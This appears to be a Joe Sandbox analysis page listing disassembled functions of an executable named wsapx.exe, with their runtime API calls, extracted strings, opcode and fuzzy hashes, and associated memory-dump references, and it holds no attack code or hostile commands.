Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
Instruction ID: b9b6ea16b84fcbe13025ca2c23c611670384b90b0d97639ecc483b1a946ed828
Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
Instruction Fuzzy Hash: AE113D21B0D64243FA68BFA5755617DE18A5FC4FB0FC48334E93E8A6D6DE2CA5438221

Function 00007FF7C71CB294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF7C71CB2A5
FlsSetValue.KERNEL32 ref: 00007FF7C71CB2C4
FlsSetValue.KERNEL32 ref: 00007FF7C71CB2EC
FlsSetValue.KERNEL32 ref: 00007FF7C71CB2FD
FlsSetValue.KERNEL32 ref: 00007FF7C71CB30E

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
Instruction ID: 16145053c0ed3a18468c6fd78810d73d1cd33425ca6b9729971fed79934a4a0a
Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
Instruction Fuzzy Hash: 32111520F0920783FA687FA5785627E918A5FC5F70FD85734D93E8A6C2DD2CB5438222

Function 00007FF7C71C6010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C604C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C6176
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C622C

Strings

verbose, xrefs: 00007FF7C71C6020

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 922d11b8d62e10db57ae46b8a43be90811dd9f96d16df67f441aa31be4d89574
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 5991D132A08A4682F761AEA5E45077DB7A1ABC0FA4FC44136DA5E433C5DF3CE4078322

Function 00007FF7C71CFC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71CFF17

Part of subcall function 00007FF7C71C7AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C7AC9

Strings

ccs, xrefs: 00007FF7C71CFE52
UTF-16LEUNICODE, xrefs: 00007FF7C71CFEB5
UTF-8, xrefs: 00007FF7C71CFE96

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: 83d486029c2d1cb82f270f4f28fc2789f2d4ab47bdb8e388e269bc910bf1185d
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: AE81A433E0824287F7646EA5A11027CB7A8AB91F64FD68035DA0997299DF2DE9039361

Function 00007FF7C71BD6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7C71BD6E3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF7C71BD77A
RtlUnwindEx.KERNEL32 ref: 00007FF7C71BD7D4

Strings

csm, xrefs: 00007FF7C71BD761

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction ID: 84f239a1754c7d21c042ef0a012b966b119375654e5d72b2eea359f60de99f95
Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction Fuzzy Hash: C4519072B296028BDB18AF15F446A78B791EB84FA8F904174DE8E47748DF3DE842C710

Function 00007FF7C71BEF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF7C71BEFA7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF7C71BEFF3

Strings

MOC, xrefs: 00007FF7C71BEFBB
RCC, xrefs: 00007FF7C71BEFC3

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction ID: 69018d22b3a797c0cf694384062b908ce680bd29574af46cd00a29181fac4f13
Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction Fuzzy Hash: 00619EB2908B8582EB20AF25F4403AAB7A4FBC5BA4F444625EF9C03B55CF7CD195CB10

Function 00007FF7C71BF2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7C71BF320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF7C71BF408

Strings

csm, xrefs: 00007FF7C71BF342
csm, xrefs: 00007FF7C71BF45A

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: 8bad83fd77456f50d4f3da069cbbc2363f3e3353a36a0c3803c1607745fba7b1
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: 0A51D3B290824287EB64AF25E084768B7A8FB94FA4F944135EE4C43BD5CF3CE552C710

Function 00007FF7C71B7E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF7C71B352C,?,00000000,00007FF7C71B3F23), ref: 00007FF7C71B7F22

Strings

\, xrefs: 00007FF7C71B7E87
%.*s, xrefs: 00007FF7C71B7EDB
%s%c, xrefs: 00007FF7C71B7E94

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
Instruction ID: a680becc744ef84d055fc3f8fae95bd78d6e72bb96fe345c70c495ba6aad656d
Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
Instruction Fuzzy Hash: 0631B671719AC146EA21AF21B4517AAA364EFC4FF4F841231EE6D477C9DE3CE6068710

Function 00007FF7C71B2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF7C71B28EA

Strings

Error, xrefs: 00007FF7C71B28DD
[PYI-%d:%ls] , xrefs: 00007FF7C71B2868
ERROR, xrefs: 00007FF7C71B286F

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction ID: aa86f1ea5dde1402545276de8a72f20fc2fdc1a5200d271e25c32b4b22ae7f82
Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction Fuzzy Hash: 7121B172B18B4182E721AF54F4857AAA3A4EBC8B94F804131EE8D93655DF3CD24AC750

Function 00007FF7C71CC610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF7C71CC68F
WriteFile.KERNEL32 ref: 00007FF7C71CC957
WriteFile.KERNEL32 ref: 00007FF7C71CC99D
GetLastError.KERNEL32 ref: 00007FF7C71CCA53

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction ID: 3aab948ca4d1a9e257958ae2f900f2c4ce8a77f9a8670dd7eb98b303ac255d78
Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction Fuzzy Hash: 25D12772B18A408BE711DFA9E4401AC7771FB94FA8B848235DE5E57B89DE38D407C750

Function 00007FF7C71CF9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7C71CFAEC
_get_daylight.LIBCMT ref: 00007FF7C71CFAFD
_get_daylight.LIBCMT ref: 00007FF7C71CFB0E
_isindst.LIBCMT ref: 00007FF7C71CFBD9

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: f0f180b177008c89fbe897a43bbf8e0c92963cfc214eed1589d3289e0cb8adaa
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: 01512973F081118BFB14EFA4A9957BCA7A9AB90B78F904135ED1D52AE4DF38A503C710

Function 00007FF7C71C57EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF7C71C581F
GetFileInformationByHandle.KERNEL32 ref: 00007FF7C71C5881
GetLastError.KERNEL32 ref: 00007FF7C71C5912
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C71C5724), ref: 00007FF7C71C595E

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction ID: 173772bec6df521791b11e27a7a1971f633386cf7eccb5fbabc1a03cd5548fa8
Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction Fuzzy Hash: 3D516222E086418BFB10EFB1E4503BDABB1AB88FA8F644575DE4D57689DF38D542C720

Function 00007FF7C71B20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF7C71B20F4
SetWindowLongPtrW.USER32 ref: 00007FF7C71B2116
GetWindowLongPtrW.USER32 ref: 00007FF7C71B2140
InvalidateRect.USER32 ref: 00007FF7C71B2160

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: e79bda630bed4a44c07d468e4c644bff8772ac87388b32baf1dfbe61957b0a38
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: BB11A971B1C14243F655AF69F9882B99291EBD9FA0FC4C030DF4A07B99CD2DD5968610

Function 00007FF7C71D5B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C71D17D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D1803

_get_daylight.LIBCMT ref: 00007FF7C71D5CA4
_get_daylight.LIBCMT ref: 00007FF7C71D5CB5

Strings

?, xrefs: 00007FF7C71D5C35

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction ID: 2a4553ba099a8aec5c5db6e110ca966514bc3a210b5364d9cf161b10ffb011ff
Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction Fuzzy Hash: 7B412B12A1868147F722AF65B481379E664EBE0FF4F944235EE5C06AD5DE3CD442CB20

Function 00007FF7C71C9084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C90B6

Part of subcall function 00007FF7C71CA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9CE
Part of subcall function 00007FF7C71CA9B8: GetLastError.KERNEL32(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9D8

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7C71BCC15), ref: 00007FF7C71C90D4

Strings

C:\Users\user\Desktop\wsapx.exe, xrefs: 00007FF7C71C90C2

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\wsapx.exe
API String ID: 3580290477-3302721598
Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction ID: 17458fd6defc6d2548aebf330592781d0acd47de8e01809fc26c857e4711c2b0
Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction Fuzzy Hash: CB414031A0865287E715FF65B8810BDA794EB84FE4BD54035EA4E43B85DE3CE4938360

Function 00007FF7C71CCCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF7C71CCDBF
GetLastError.KERNEL32 ref: 00007FF7C71CCDE1

Strings

U, xrefs: 00007FF7C71CCD6B

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: a2e211a56e73fee2a883212f16d36f7c676aa409a19189427c2e43a6ffa515af
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: 6F41A772B18A4586DB209F65F4443B9A761FBD4BA4F844035EE4D87B98DF3CD502CB50

Function 00007FF7C71CF628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF7C71CF668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7C71CF6BA

Strings

:, xrefs: 00007FF7C71CF67E

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
Instruction ID: 5fb5493a09cc253c9a3302ad274e7611088f32cc27f6fc463b717bc04ae42c2e
Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
Instruction Fuzzy Hash: 1421CE63A0829183EB20AF55E04426DB3B5FBC8F94FD58035DA8D43694DF7CEA46CB61

Function 00007FF7C71BFDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF7C71BFE08
RaiseException.KERNEL32 ref: 00007FF7C71BFE49

Strings

csm, xrefs: 00007FF7C71BFE36

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

